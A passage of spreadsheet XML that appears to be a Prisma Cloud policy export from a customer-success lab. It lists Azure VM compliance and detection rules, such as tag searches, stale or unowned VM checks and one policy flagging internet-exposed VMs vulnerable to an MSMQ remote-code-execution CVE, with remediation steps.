      <c r="AK2493" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2494">
      <c r="A2494" t="inlineStr"/>
      <c r="B2494" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2494" s="2" t="inlineStr"/>
      <c r="D2494" t="n">
        <v>0</v>
      </c>
      <c r="E2494" t="n">
        <v>1</v>
      </c>
      <c r="F2494" t="n">
        <v>0</v>
      </c>
      <c r="G2494" t="b">
        <v>1</v>
      </c>
      <c r="H24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mdavis test 10302024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2494" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2494" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2494" t="inlineStr">
        <is>
          <t>mdavis1 tag test 4</t>
        </is>
      </c>
      <c r="L2494" t="inlineStr"/>
      <c r="M2494" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2494" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2494" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2494" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2494" t="inlineStr"/>
      <c r="R2494" t="inlineStr"/>
      <c r="S2494" t="inlineStr"/>
      <c r="T2494" t="b">
        <v>0</v>
      </c>
      <c r="U2494" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2494" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2494" t="inlineStr"/>
      <c r="X2494" t="inlineStr"/>
      <c r="Y2494" t="inlineStr"/>
      <c r="Z2494" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = tags contains "blue"</t>
        </is>
      </c>
      <c r="AA2494" t="inlineStr">
        <is>
          <t>Mark Davis</t>
        </is>
      </c>
      <c r="AB2494" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2494" t="inlineStr"/>
      <c r="AD2494" t="b">
        <v>0</v>
      </c>
      <c r="AE2494" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2494" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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mdavis test 10302024 - Notifications:email, AccountGroups:PCS AWS Lab Org,PCS Azure Accounts,PCS SWAT - Autoremediation Group,PCS SWAT Account Group - DO NOT TOUCH,PCS Lab OCI Accounts,PCSLABAG-MA,PCS GCP Accounts,PCS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4" t="inlineStr">
        <is>
          <t>94e528c5-8ae6-4907-9af7-7d14577e0d0c</t>
        </is>
      </c>
      <c r="AI2494" t="inlineStr">
        <is>
          <t>0499958b-ca1d-47cb-a289-c07f27c139fd</t>
        </is>
      </c>
      <c r="AJ2494" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2494" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2495">
      <c r="A2495" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2495" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2495" s="2" t="inlineStr"/>
      <c r="D2495" t="n">
        <v>34</v>
      </c>
      <c r="E2495" t="n">
        <v>15</v>
      </c>
      <c r="F2495" t="n">
        <v>0</v>
      </c>
      <c r="G2495" t="b">
        <v>1</v>
      </c>
      <c r="H2495"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95" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2495" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2495" t="inlineStr">
        <is>
          <t>Azure VM - 3 Days - No Owner</t>
        </is>
      </c>
      <c r="L2495" t="inlineStr"/>
      <c r="M2495" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2495" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2495" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2495" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2495" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2495" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2495" t="inlineStr"/>
      <c r="T2495" t="b">
        <v>0</v>
      </c>
      <c r="U2495" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2495" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2495" t="inlineStr">
        <is>
          <t>Azure - for VMs - find instances older than 3 days that do NOT have an "owner" tag</t>
        </is>
      </c>
      <c r="X2495" t="inlineStr"/>
      <c r="Y2495" t="inlineStr"/>
      <c r="Z2495" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' and json.rule = "_DateTime.ageInDays(['properties.timeCreated']) &gt; 3 and tags does not contain owner and tags does not contain Owner" addcolumn tags</t>
        </is>
      </c>
      <c r="AA2495" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2495" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2495" t="inlineStr"/>
      <c r="AD2495" t="b">
        <v>0</v>
      </c>
      <c r="AE2495" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2495" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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95" t="inlineStr">
        <is>
          <t>9bf7b6e4-ecfc-4388-bb01-a589138b704d</t>
        </is>
      </c>
      <c r="AI2495" t="inlineStr">
        <is>
          <t>4d7c4c65-928f-4797-a72e-9a1d91f4eb2b</t>
        </is>
      </c>
      <c r="AJ2495" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2495" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2496">
      <c r="A2496" t="inlineStr"/>
      <c r="B2496" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2496" s="2" t="inlineStr"/>
      <c r="D2496" t="n">
        <v>0</v>
      </c>
      <c r="E2496" t="n">
        <v>1</v>
      </c>
      <c r="F2496" t="n">
        <v>0</v>
      </c>
      <c r="G2496" t="b">
        <v>1</v>
      </c>
      <c r="H24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mdavis test 10302024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2496" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2496" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2496" t="inlineStr">
        <is>
          <t>mdavis1 test 10302024</t>
        </is>
      </c>
      <c r="L2496" t="inlineStr"/>
      <c r="M2496" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2496" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2496" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2496" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2496" t="inlineStr"/>
      <c r="R2496" t="inlineStr"/>
      <c r="S2496" t="inlineStr"/>
      <c r="T2496" t="b">
        <v>0</v>
      </c>
      <c r="U2496" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2496" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2496" t="inlineStr">
        <is>
          <t>tag search</t>
        </is>
      </c>
      <c r="X2496" t="inlineStr"/>
      <c r="Y2496" t="inlineStr"/>
      <c r="Z2496" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = tags contains "unicron"</t>
        </is>
      </c>
      <c r="AA2496" t="inlineStr">
        <is>
          <t>Mark Davis</t>
        </is>
      </c>
      <c r="AB2496" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2496" t="inlineStr"/>
      <c r="AD2496" t="b">
        <v>0</v>
      </c>
      <c r="AE2496" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2496" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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mdavis test 10302024 - Notifications:email, AccountGroups:PCS AWS Lab Org,PCS Azure Accounts,PCS SWAT - Autoremediation Group,PCS SWAT Account Group - DO NOT TOUCH,PCS Lab OCI Accounts,PCSLABAG-MA,PCS GCP Accounts,PCS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6" t="inlineStr">
        <is>
          <t>d0ff9850-0235-4a4f-9c4f-2a87f7e83808</t>
        </is>
      </c>
      <c r="AI2496" t="inlineStr">
        <is>
          <t>4879243d-663b-4db9-aed4-c057b71ead61</t>
        </is>
      </c>
      <c r="AJ2496" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2496" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2497">
      <c r="A2497" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2497" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2497" s="2" t="inlineStr"/>
      <c r="D2497" t="n">
        <v>0</v>
      </c>
      <c r="E2497" t="n">
        <v>28</v>
      </c>
      <c r="F2497" t="n">
        <v>0</v>
      </c>
      <c r="G2497" t="b">
        <v>1</v>
      </c>
      <c r="H24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497" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2497" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2497" t="inlineStr">
        <is>
          <t>Azure VM - 45 Days - Owned</t>
        </is>
      </c>
      <c r="L2497" t="inlineStr"/>
      <c r="M2497" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2497" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2497" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2497" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2497" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2497" t="inlineStr">
        <is>
          <t>5.1.2 Config - Stale Compute Resources</t>
        </is>
      </c>
      <c r="S2497" t="inlineStr"/>
      <c r="T2497" t="b">
        <v>0</v>
      </c>
      <c r="U2497" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2497" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2497" t="inlineStr"/>
      <c r="X2497" t="inlineStr"/>
      <c r="Y2497" t="inlineStr"/>
      <c r="Z2497" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' and json.rule = tags contains "owner" and json.rule = "_DateTime.ageInDays(['properties.timeCreated']) &gt; 45"</t>
        </is>
      </c>
      <c r="AA2497" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2497" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2497" t="inlineStr"/>
      <c r="AD2497" t="b">
        <v>0</v>
      </c>
      <c r="AE2497" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2497" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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497" t="inlineStr">
        <is>
          <t>8f303706-499e-4dcd-8178-7499d49a8d9d</t>
        </is>
      </c>
      <c r="AI2497" t="inlineStr">
        <is>
          <t>24af5c71-428e-45e0-9dd0-d183e7fe85a7</t>
        </is>
      </c>
      <c r="AJ2497" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2497" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2498">
      <c r="A2498" t="inlineStr"/>
      <c r="B2498" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2498" s="2" t="inlineStr"/>
      <c r="D2498" t="inlineStr"/>
      <c r="E2498" t="inlineStr"/>
      <c r="F2498" t="inlineStr"/>
      <c r="G2498" t="b">
        <v>1</v>
      </c>
      <c r="H24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498" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2498" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2498" t="inlineStr">
        <is>
          <t>Azure VM has tag mdavis1 v2</t>
        </is>
      </c>
      <c r="L2498" t="inlineStr"/>
      <c r="M2498" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2498" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2498" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2498" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2498" t="inlineStr"/>
      <c r="R2498" t="inlineStr"/>
      <c r="S2498" t="inlineStr">
        <is>
          <t>mdavis1-test-label</t>
        </is>
      </c>
      <c r="T2498" t="b">
        <v>0</v>
      </c>
      <c r="U2498" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2498" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2498" t="inlineStr">
        <is>
          <t>Azure VM has tag mdavis1 Descriptor</t>
        </is>
      </c>
      <c r="X2498" t="inlineStr"/>
      <c r="Y2498" t="inlineStr"/>
      <c r="Z2498" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' AND json.rule = tags contains "brooklyn"</t>
        </is>
      </c>
      <c r="AA2498" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2498" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2498" t="inlineStr"/>
      <c r="AD2498" t="b">
        <v>0</v>
      </c>
      <c r="AE2498" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2498" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>42c6a3e7-2eee-4c6d-934f-94f826cd4621</t>
        </is>
      </c>
      <c r="AI2498" t="inlineStr">
        <is>
          <t>67b190e0-ecd7-4e2b-ada9-49ab437eafa0</t>
        </is>
      </c>
      <c r="AJ2498" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2498" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2499">
      <c r="A2499" t="inlineStr">
        <is>
          <t>CIS v1.1 (Azure)</t>
        </is>
      </c>
      <c r="B2499" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2499" s="2" t="inlineStr"/>
      <c r="D2499" t="inlineStr"/>
      <c r="E2499" t="inlineStr"/>
      <c r="F2499" t="inlineStr"/>
      <c r="G2499" t="b">
        <v>0</v>
      </c>
      <c r="H24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mdavis1 AIG snoozed alert test rule1, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2499" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2499" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2499" t="inlineStr">
        <is>
          <t>mdavis1 AIG snoozed alert test</t>
        </is>
      </c>
      <c r="L2499" t="inlineStr"/>
      <c r="M2499" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2499" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2499" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2499" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2499" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R2499" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="S2499" t="inlineStr"/>
      <c r="T2499" t="b">
        <v>0</v>
      </c>
      <c r="U2499" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2499" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2499" t="inlineStr"/>
      <c r="X2499" t="inlineStr"/>
      <c r="Y2499" t="inlineStr"/>
      <c r="Z2499" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = tags contains "LV-426"</t>
        </is>
      </c>
      <c r="AA2499" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2499" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2499" t="inlineStr"/>
      <c r="AD2499" t="b">
        <v>0</v>
      </c>
      <c r="AE2499" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2499" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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mdavis1 AIG snoozed alert test rule1 - Notifications:, AccountGroups:mdavis1 Azure Alert Test account group;,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499" t="inlineStr">
        <is>
          <t>663b0988-8a3a-458d-a7c2-7202338a5310</t>
        </is>
      </c>
      <c r="AI2499" t="inlineStr">
        <is>
          <t>8e8226d4-6de3-4eca-89df-aebc20f79d07</t>
        </is>
      </c>
      <c r="AJ2499" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2499" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2500">
      <c r="A2500" t="inlineStr"/>
      <c r="B2500" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2500" s="2" t="inlineStr"/>
      <c r="D2500" t="inlineStr"/>
      <c r="E2500" t="inlineStr"/>
      <c r="F2500" t="inlineStr"/>
      <c r="G2500" t="b">
        <v>0</v>
      </c>
      <c r="H25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00" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2500" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2500" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="L2500" t="inlineStr"/>
      <c r="M2500" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2500" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2500" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2500" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2500" t="inlineStr"/>
      <c r="R2500" t="inlineStr"/>
      <c r="S2500" t="inlineStr"/>
      <c r="T2500" t="b">
        <v>0</v>
      </c>
      <c r="U2500" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2500" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2500" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="X2500" t="inlineStr"/>
      <c r="Y2500" t="inlineStr"/>
      <c r="Z2500" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = tags contains "LV-426"</t>
        </is>
      </c>
      <c r="AA2500" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2500" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2500" t="inlineStr"/>
      <c r="AD2500" t="b">
        <v>0</v>
      </c>
      <c r="AE2500" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2500" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>341648bb-8ddc-49f3-81a6-9819b79e5034</t>
        </is>
      </c>
      <c r="AI2500" t="inlineStr">
        <is>
          <t>8e8226d4-6de3-4eca-89df-aebc20f79d07</t>
        </is>
      </c>
      <c r="AJ2500" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2500" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2501">
      <c r="A2501" t="inlineStr">
        <is>
          <t>CIS v1.1 (Azure)</t>
        </is>
      </c>
      <c r="B2501" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2501" s="2" t="inlineStr"/>
      <c r="D2501" t="inlineStr"/>
      <c r="E2501" t="inlineStr"/>
      <c r="F2501" t="inlineStr"/>
      <c r="G2501" t="b">
        <v>0</v>
      </c>
      <c r="H25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01" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2501" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2501" t="inlineStr">
        <is>
          <t>Copy of mdavis1 AIG snoozed alert test 2</t>
        </is>
      </c>
      <c r="L2501" t="inlineStr"/>
      <c r="M2501" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2501" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2501" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2501" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2501" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R2501" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="S2501" t="inlineStr"/>
      <c r="T2501" t="b">
        <v>0</v>
      </c>
      <c r="U2501" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2501" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2501" t="inlineStr"/>
      <c r="X2501" t="inlineStr"/>
      <c r="Y2501" t="inlineStr"/>
      <c r="Z2501" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = tags contains "LV-426"</t>
        </is>
      </c>
      <c r="AA2501" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2501" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2501" t="inlineStr"/>
      <c r="AD2501" t="b">
        <v>0</v>
      </c>
      <c r="AE2501" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2501" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>6171477a-ec06-4981-9d52-436444c1cba5</t>
        </is>
      </c>
      <c r="AI2501" t="inlineStr">
        <is>
          <t>8e8226d4-6de3-4eca-89df-aebc20f79d07</t>
        </is>
      </c>
      <c r="AJ2501" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2501" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2502">
      <c r="A2502" t="inlineStr"/>
      <c r="B2502" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2502" s="2" t="inlineStr"/>
      <c r="D2502" t="inlineStr"/>
      <c r="E2502" t="inlineStr"/>
      <c r="F2502" t="inlineStr"/>
      <c r="G2502" t="b">
        <v>0</v>
      </c>
      <c r="H25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502" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2502" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2502" t="inlineStr">
        <is>
          <t>Computername contains dmtest</t>
        </is>
      </c>
      <c r="L2502" t="inlineStr"/>
      <c r="M2502" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2502" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2502" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2502" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2502" t="inlineStr"/>
      <c r="R2502" t="inlineStr"/>
      <c r="S2502" t="inlineStr">
        <is>
          <t>pratik</t>
        </is>
      </c>
      <c r="T2502" t="b">
        <v>0</v>
      </c>
      <c r="U2502" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2502" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2502" t="inlineStr"/>
      <c r="X2502" t="inlineStr"/>
      <c r="Y2502" t="inlineStr"/>
      <c r="Z2502" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' and json.rule = ['properties.osProfile'].computerName contains dmtest</t>
        </is>
      </c>
      <c r="AA2502" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2502" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2502" t="inlineStr"/>
      <c r="AD2502" t="b">
        <v>0</v>
      </c>
      <c r="AE2502" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2502" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>5623ee57-c1fb-44ba-b252-941737d72827</t>
        </is>
      </c>
      <c r="AI2502" t="inlineStr">
        <is>
          <t>55a46653-9c94-4df3-ac2c-b2f0d8be88a4</t>
        </is>
      </c>
      <c r="AJ2502" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2502" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2503">
      <c r="A2503" t="inlineStr"/>
      <c r="B2503" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2503" s="2" t="inlineStr"/>
      <c r="D2503" t="inlineStr"/>
      <c r="E2503" t="inlineStr"/>
      <c r="F2503" t="inlineStr"/>
      <c r="G2503" t="b">
        <v>1</v>
      </c>
      <c r="H25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03" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2503" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2503" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Microsoft Message Queuing (MSMQ), CVE-2023-21554)</t>
        </is>
      </c>
      <c r="L2503" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2503" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2503" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2503" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2503" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2503" t="inlineStr"/>
      <c r="R2503" t="inlineStr"/>
      <c r="S2503" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2503" t="b">
        <v>0</v>
      </c>
      <c r="U2503" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2503" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2503" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-21554).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Microsoft Message Queuing (MSMQ)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Microsoft Message Queuing (MSMQ) (CVE-2023-21554) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2503"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CVE-2023-21554
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-21554</t>
        </is>
      </c>
      <c r="Y2503" t="inlineStr"/>
      <c r="Z2503" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-21554'))</t>
        </is>
      </c>
      <c r="AA2503" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2503" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:16</t>
        </is>
      </c>
